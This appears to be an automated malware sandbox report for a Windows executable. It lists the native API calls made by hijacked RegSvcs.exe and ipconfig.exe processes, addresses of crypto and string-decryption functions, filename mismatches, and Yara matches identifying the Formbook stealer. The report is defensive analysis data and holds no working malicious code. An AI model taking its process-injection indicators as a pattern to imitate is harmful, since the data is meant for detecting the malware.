Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829A00 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_01829A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829A20 NtResumeThread,LdrInitializeThunk, 6_2_01829A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829A50 NtCreateFile,LdrInitializeThunk, 6_2_01829A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018295D0 NtClose,LdrInitializeThunk, 6_2_018295D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829540 NtReadFile,LdrInitializeThunk, 6_2_01829540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829780 NtMapViewOfSection,LdrInitializeThunk, 6_2_01829780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018297A0 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_018297A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829710 NtQueryInformationToken,LdrInitializeThunk, 6_2_01829710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018296E0 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_018296E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_01829660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018299D0 NtCreateProcessEx, 6_2_018299D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829950 NtQueueApcThread, 6_2_01829950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018298A0 NtWriteVirtualMemory, 6_2_018298A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829820 NtEnumerateKey, 6_2_01829820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0182B040 NtSuspendThread, 6_2_0182B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0182A3B0 NtGetContextThread, 6_2_0182A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829B00 NtSetValueKey, 6_2_01829B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829A80 NtOpenDirectoryObject, 6_2_01829A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829A10 NtQuerySection, 6_2_01829A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018295F0 NtQueryInformationFile, 6_2_018295F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829520 NtWaitForSingleObject, 6_2_01829520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0182AD30 NtSetContextThread, 6_2_0182AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829560 NtWriteFile, 6_2_01829560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829FE0 NtCreateMutant, 6_2_01829FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0182A710 NtOpenProcessToken, 6_2_0182A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829730 NtQueryVirtualMemory, 6_2_01829730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829760 NtOpenProcess, 6_2_01829760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829770 NtSetInformationFile, 6_2_01829770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0182A770 NtOpenThread, 6_2_0182A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018296D0 NtCreateKey, 6_2_018296D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829610 NtEnumerateValueKey, 6_2_01829610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829650 NtQueryValueKey, 6_2_01829650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01829670 NtQueryInformationProcess, 6_2_01829670
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429A50 NtCreateFile,LdrInitializeThunk, 9_2_03429A50
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429910 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_03429910
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034299A0 NtCreateSection,LdrInitializeThunk, 9_2_034299A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429840 NtDelayExecution,LdrInitializeThunk, 9_2_03429840
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429860 NtQuerySystemInformation,LdrInitializeThunk, 9_2_03429860
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429710 NtQueryInformationToken,LdrInitializeThunk, 9_2_03429710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429FE0 NtCreateMutant,LdrInitializeThunk, 9_2_03429FE0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429780 NtMapViewOfSection,LdrInitializeThunk, 9_2_03429780
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034296D0 NtCreateKey,LdrInitializeThunk, 9_2_034296D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034296E0 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_034296E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429540 NtReadFile,LdrInitializeThunk, 9_2_03429540
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034295D0 NtClose,LdrInitializeThunk, 9_2_034295D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429B00 NtSetValueKey, 9_2_03429B00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0342A3B0 NtGetContextThread, 9_2_0342A3B0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429A00 NtProtectVirtualMemory, 9_2_03429A00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429A10 NtQuerySection, 9_2_03429A10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429A20 NtResumeThread, 9_2_03429A20
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429A80 NtOpenDirectoryObject, 9_2_03429A80
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429950 NtQueueApcThread, 9_2_03429950
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034299D0 NtCreateProcessEx, 9_2_034299D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0342B040 NtSuspendThread, 9_2_0342B040
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429820 NtEnumerateKey, 9_2_03429820
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034298F0 NtReadVirtualMemory, 9_2_034298F0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034298A0 NtWriteVirtualMemory, 9_2_034298A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429760 NtOpenProcess, 9_2_03429760
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0342A770 NtOpenThread, 9_2_0342A770
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429770 NtSetInformationFile, 9_2_03429770
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0342A710 NtOpenProcessToken, 9_2_0342A710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429730 NtQueryVirtualMemory, 9_2_03429730
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034297A0 NtUnmapViewOfSection, 9_2_034297A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429650 NtQueryValueKey, 9_2_03429650
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429660 NtAllocateVirtualMemory, 9_2_03429660
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429670 NtQueryInformationProcess, 9_2_03429670
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429610 NtEnumerateValueKey, 9_2_03429610
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429560 NtWriteFile, 9_2_03429560
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03429520 NtWaitForSingleObject, 9_2_03429520
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0342AD30 NtSetContextThread, 9_2_0342AD30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034295F0 NtQueryInformationFile, 9_2_034295F0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E19E90 NtClose, 9_2_02E19E90
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E19E10 NtReadFile, 9_2_02E19E10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E19D60 NtCreateFile, 9_2_02E19D60
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E19E0A NtReadFile, 9_2_02E19E0A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E19D5A NtCreateFile, 9_2_02E19D5A
Detected potential crypto function
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_0184B23C 0_2_0184B23C
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_0184C2B0 0_2_0184C2B0
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_01849968 0_2_01849968
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_0184DF73 0_2_0184DF73
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_05233C60 0_2_05233C60
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_05233930 0_2_05233930
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_052349A8 0_2_052349A8
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_05230040 0_2_05230040
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_052370C7 0_2_052370C7
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_052308D0 0_2_052308D0
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_052343C8 0_2_052343C8
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_05235A68 0_2_05235A68
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_05235440 0_2_05235440
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_05233C53 0_2_05233C53
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_05231CE8 0_2_05231CE8
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_05231CF8 0_2_05231CF8
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_05238FA0 0_2_05238FA0
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_05233920 0_2_05233920
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_052371B7 0_2_052371B7
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_05234998 0_2_05234998
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_05230006 0_2_05230006
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_05235860 0_2_05235860
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_052348F1 0_2_052348F1
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_052308C3 0_2_052308C3
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Code function: 0_2_052343B8 0_2_052343B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00401030 6_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041E9AA 6_2_0041E9AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041E25B 6_2_0041E25B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00402D89 6_2_00402D89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00402D90 6_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00409E40 6_2_00409E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00409E3F 6_2_00409E3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041DFF2 6_2_0041DFF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041CFA3 6_2_0041CFA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00402FB0 6_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018099BF 6_2_018099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EF900 6_2_017EF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01804120 6_2_01804120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018120A0 6_2_018120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B20A8 6_2_018B20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B28EC 6_2_018B28EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1002 6_2_018A1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018BE824 6_2_018BE824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A830 6_2_0180A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FB090 6_2_017FB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181EBB0 6_2_0181EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A03DA 6_2_018A03DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018ADBD2 6_2_018ADBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181ABD8 6_2_0181ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018923E3 6_2_018923E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A309 6_2_0180A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B2B28 6_2_018B2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180AB40 6_2_0180AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0188CB4F 6_2_0188CB4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B22AE 6_2_018B22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0189FA2B 6_2_0189FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812581 6_2_01812581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2D82 6_2_018A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B25DD 6_2_018B25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E0D20 6_2_017E0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B2D07 6_2_018B2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FD5E0 6_2_017FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B1D55 6_2_018B1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F841F 6_2_017F841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AD466 6_2_018AD466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018BDFCE 6_2_018BDFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B1FF1 6_2_018B1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B2EF7 6_2_018B2EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AD616 6_2_018AD616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01806E30 6_2_01806E30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340AB40 9_2_0340AB40
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0348CB4F 9_2_0348CB4F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A309 9_2_0340A309
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034B2B28 9_2_034B2B28
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A03DA 9_2_034A03DA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034ADBD2 9_2_034ADBD2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0341ABD8 9_2_0341ABD8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034923E3 9_2_034923E3
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0341138B 9_2_0341138B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340EB9A 9_2_0340EB9A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0341EBB0 9_2_0341EBB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0349FA2B 9_2_0349FA2B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340B236 9_2_0340B236
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4AEF 9_2_034A4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034B22AE 9_2_034B22AE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033EF900 9_2_033EF900
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03404120 9_2_03404120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034099BF 9_2_034099BF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A1002 9_2_034A1002
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034BE824 9_2_034BE824
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340A830 9_2_0340A830
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034B28EC 9_2_034B28EC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033FB090 9_2_033FB090
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034120A0 9_2_034120A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034B20A8 9_2_034B20A8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034BDFCE 9_2_034BDFCE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034B1FF1 9_2_034B1FF1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03405600 9_2_03405600
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034AD616 9_2_034AD616
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03406E30 9_2_03406E30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034B2EF7 9_2_034B2EF7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03491EB6 9_2_03491EB6
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033E0D20 9_2_033E0D20
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034B1D55 9_2_034B1D55
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034B2D07 9_2_034B2D07
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034B25DD 9_2_034B25DD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_03412581 9_2_03412581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A2D82 9_2_034A2D82
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033FD5E0 9_2_033FD5E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_033F841F 9_2_033F841F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034AD466 9_2_034AD466
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_0340B477 9_2_0340B477
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_034A4496 9_2_034A4496
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E1E25B 9_2_02E1E25B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E1E9AA 9_2_02E1E9AA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E09E40 9_2_02E09E40
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E09E3F 9_2_02E09E3F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E1DFF2 9_2_02E1DFF2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E1CFA3 9_2_02E1CFA3
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E02FB0 9_2_02E02FB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E02D89 9_2_02E02D89
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 9_2_02E02D90 9_2_02E02D90
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 017EB150 appears 136 times
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: String function: 033EB150 appears 145 times
Sample file is different than original file name gathered from version info
Source: YNzE2QUkvaTK7kd.exe Binary or memory string: OriginalFilename vs YNzE2QUkvaTK7kd.exe
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.673315905.0000000007B20000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll" vs YNzE2QUkvaTK7kd.exe
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.673675367.0000000007E20000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs YNzE2QUkvaTK7kd.exe
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.666101790.00000000031B1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSimpleUI.dll2 vs YNzE2QUkvaTK7kd.exe
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.673986047.000000000DE60000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs YNzE2QUkvaTK7kd.exe
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.674184331.000000000DF50000.00000002.00000001.sdmp Binary or memory string: originalfilename vs YNzE2QUkvaTK7kd.exe
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000002.674184331.000000000DF50000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs YNzE2QUkvaTK7kd.exe
Source: YNzE2QUkvaTK7kd.exe, 00000000.00000003.665063279.000000000D596000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameEventKeywords.exe> vs YNzE2QUkvaTK7kd.exe
Source: YNzE2QUkvaTK7kd.exe Binary or memory string: OriginalFilenameEventKeywords.exe> vs YNzE2QUkvaTK7kd.exe
Uses 32bit PE files
Source: YNzE2QUkvaTK7kd.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.702411674.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.911335955.0000000000940000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.911335955.0000000000940000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.911866298.0000000002E00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.911866298.0000000002E00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.667772348.000000000436B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.667772348.000000000436B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.701293612.0000000001780000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
